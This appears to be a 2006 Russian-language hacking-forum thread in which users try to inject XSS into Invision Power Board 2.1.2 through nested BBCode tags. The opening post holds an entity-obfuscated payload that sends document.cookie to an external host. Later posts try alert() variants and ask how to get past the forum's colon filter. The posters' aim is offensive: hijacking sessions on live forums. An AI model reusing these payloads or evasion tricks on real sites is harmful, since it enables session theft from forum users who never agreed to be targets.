Форум АНТИЧАТ - Вопрос про XSS на форуме IPB 2.1.2.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Вопрос про XSS на форуме IPB 2.1.2. (https://forum.antichat.xyz/showthread.php?t=12733)

Astro

09.01.2006 23:08

Вопрос про XSS на форуме IPB 2.1.2.

Вот пытаюсь вставить эту XSS:

Код HTML:

[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]

Естественно без звездочек, пост на форуме пустой если поставить алерт

Код HTML:

[post=1000[topic=target style=background:url(javascript:alert()); ] [/topic]]

, то он не выскакивает.

max_pain89

09.01.2006 23:09

каким браузером?

Astro

09.01.2006 23:12

Ie 6.0

max_pain89

09.01.2006 23:17

Попробуй таким макаром

Код HTML:

[topic=1000[post=aaa/ style=background:url(javascript:alert()); [/topic][/post]

Astro

10.01.2006 16:11

Не выходит, даже код не скрывает.

Astro

10.01.2006 21:10

Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки)

Код HTML:

                <div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '>       </a>'><br /><br /><br /></a></div>

Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...

max_pain89

10.01.2006 22:06

&*#58; естественно без звезды

Astro

10.01.2006 22:19

Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
Так есть ли другой код или способ обойти фильтрацию двоеточий?

Время: 22:38